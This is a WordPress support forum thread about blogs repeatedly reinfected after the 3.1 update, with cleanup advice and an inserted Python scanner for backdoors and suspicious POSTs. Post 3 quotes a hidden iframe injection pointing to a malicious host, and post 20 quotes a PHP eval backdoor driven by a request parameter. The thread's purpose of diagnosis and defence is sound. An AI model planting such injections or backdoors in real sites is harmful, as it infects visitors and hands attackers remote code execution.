All wordpress blogs being HACKED (21 posts)

  1. bremmerm
    Member
    Posted 3 years ago #

    All wordpress blogs are updated to 3.1.

    Code keeps getting put in following file: public_html/index.php

    Code is:

    [Code moderated as per the Forum Rules. Please use the pastebin]

    I delete it and a few hours later it is back. I have no idea how to clean this, all sites are being blocked by google.

    My host is bluehost. This has happened to all the wordpress blogs on two different accounts, one has a dedicated IP and one uses the shared IP.

  2. esmi
    Forum Moderator
    Posted 3 years ago #

  3. bremmerm
    Member
    Posted 3 years ago #

    Here is the code it places at the top of the websites:

    <div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://hdhj3skfskh.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNDAACBgwHBA==" width="10" height="10"></iframe></div><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

    and here is a link to one infected website: [Link removed] - This is a HUGE problem for business right now!

    You may not want to visit the website, it may give off a virus.

    *Note we have completely scanned our computers

  4. Samuel B
    moderator
    Posted 3 years ago #

    read esmi's links and follow the instructions

  5. bremmerm
    Member
    Posted 3 years ago #

    Man. That is going to take a lot of work deleting and uploading all the blogs..

  6. Samuel B
    moderator
    Posted 3 years ago #

    no doubt - i've done it many times for clients, but it's the only sure way to get it clean

  7. kmosli
    Member
    Posted 3 years ago #

    Samuel B,

    Thanks for sharing, but which method you meant is the best one?

    My wife and I have a photo. business and our blog got hacked!

    Please advise,
    thanks
    Khaled Mosli

  8. Samuel B
    moderator
    Posted 3 years ago #

    the 1st link will do it
    the 2nd link is how to close the back doors
    also.
    http://codex.wordpress.org/Hardening_WordPress

  9. kmosli
    Member
    Posted 3 years ago #

    Thanks Samuel! I will get on it.

    I have a question though, What if I don't have a recent backup?

    Thanks again.

  10. Samuel B
    moderator
    Posted 3 years ago #

    What if I don't have a recent backup?

    hmmm...
    I would export my current db as an .sql file
    open it in notepad and do searches for the bad stuff

    back this file up before modifying

  11. kmosli
    Member
    Posted 3 years ago #

    Sure I will! will keep you posted.

    Thanks.
    Khaled

  12. kmosli
    Member
    Posted 3 years ago #

    Hey Samuel,

    You mentioned that you did it for clients! I was wondering if we would like you to do it for our business blog?

    Thanks
    Khaled

  13. Samuel B
    moderator
    Posted 3 years ago #

    You mentioned that you did it for clients! I was wondering if we would like you to do it for our business blog?

    sorry - I can't - I won't solicit business from this site

    however,
    http://jobs.wordpress.net/

  14. kmosli
    Member
    Posted 3 years ago #

    Oh sorry I didn't realize that you work for wordpress! I will check the website. By the way, I have not started the fixing, and all of a sudden, the blog loads just fine!

    Did you guys try to fix it? not sure what happened!

    Thanks
    Khaled Mosli

  15. bremmerm
    Member
    Posted 3 years ago #

    That has happened to me a few times. I think the code is set to disappear and reactivate. But yeah I thought everything was good after I went to a couple sites and it was okay again. But now they are all down yet again..

  16. bremmerm
    Member
    Posted 3 years ago #

    Manual -

    So if I have 4 blogs on a server, should I erase them all at the same time before uploading a fresh copy?

  17. Moodles
    Member
    Posted 3 years ago #

    moderator, the link he posted to the hacked site set off my antivirus program, has a trojan -- link should be removed

  18. mvandemar
    Member
    Posted 3 years ago #

    bremmerm - if all of the sites are running under the same username then yes, it is best to delete them all at the same time. If you have either cpanel or ssh access you can minimize the amount of downtime involved with that by uploading clean copies of the sites first, in compressed format. Then you delete them all, and unzip the new copies into their respective directories. Depending on the total size of the sites you could probably delete the infected ones and unzip the clean ones in a matter of minutes. Just make sure you don't try and delete them via ftp, as that can take ages to do. Once the files are all replaced you can clean the databases, or alternatively clean local copies of them first, then delete and re-upload the new ones.

  19. bremmerm
    Member
    Posted 3 years ago #

    Thanks, mvandemar!

  20. WeWatch
    Member
    Posted 3 years ago #

    In a few of these very same cases, we've found the culprit to be a file that has nothing more than this in it:

    /** Sets up vars and included files. */

    if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));

    /** Stop sets up vars and included files. */

    In many of these cases, this was found in an archives.php file in:

    wp-content/themes/classic/ folder, but we've found it in other files as well. If you look in the access-logs you'll see POSTs of between 7,200 and 7,900 bytes around the same time your files are infected.

    This has typically happened before the upgrade to 3.1, but wasn't noticed until after.
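A detection sketch for the two indicators in WeWatch's post above, added here as an example and not part of the original thread: it walks a site tree for PHP lines that pass a request superglobal into `eval()`, and filters access-log entries for POSTs whose size field falls in the 7,200 to 7,900 byte range. It assumes Apache combined log format and that the byte count mentioned is that format's size field; the function names are hypothetical and the sample log lines are constructed.

```python
import re
from pathlib import Path

# Request superglobal passed (optionally through wrappers such as
# stripslashes) straight into eval(), as in the file WeWatch describes.
BACKDOOR_RE = re.compile(
    r"eval\s*\(\s*(?:\w+\s*\(\s*)*\$_(?:REQUEST|POST|GET|COOKIE)\s*\[", re.I)

# Combined log format: host ident user [time] "METHOD path proto" status bytes
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\d+|-)')

def scan_php_tree(root):
    """Return (path, line_no, line) for every PHP line matching BACKDOOR_RE."""
    hits = []
    for path in sorted(Path(root).rglob("*.php")):
        text = path.read_text(errors="replace")
        for no, line in enumerate(text.splitlines(), 1):
            if BACKDOOR_RE.search(line):
                hits.append((str(path), no, line.strip()))
    return hits

def suspicious_posts(log_lines, lo=7200, hi=7900):
    """Return (ip, time, path, size) for POSTs whose size field is in [lo, hi]."""
    out = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m.group(3) != "POST" or m.group(6) == "-":
            continue
        size = int(m.group(6))
        if lo <= size <= hi:
            out.append((m.group(1), m.group(2), m.group(4), size))
    return out

# Constructed sample entries (documentation IP ranges), not real log data.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2011:03:14:07 +0000] "POST /wp-content/themes/classic/archives.php HTTP/1.1" 200 7512 "-" "-"',
    '203.0.113.9 - - [12/Mar/2011:03:15:00 +0000] "GET /index.php HTTP/1.1" 200 7600 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Mar/2011:03:16:00 +0000] "POST /wp-login.php HTTP/1.1" 302 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    import sys
    for hit in scan_php_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("backdoor pattern:", *hit)
    for post in suspicious_posts(SAMPLE_LOG):
        print("suspicious POST:", *post)
```

The path of each flagged POST is the first place to look for a planted file, and a file hit that has no matching log entry still needs to be replaced from a clean copy.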

  21. bremmerm
    Member
    Posted 3 years ago #

    Thanks for the info WeWatch
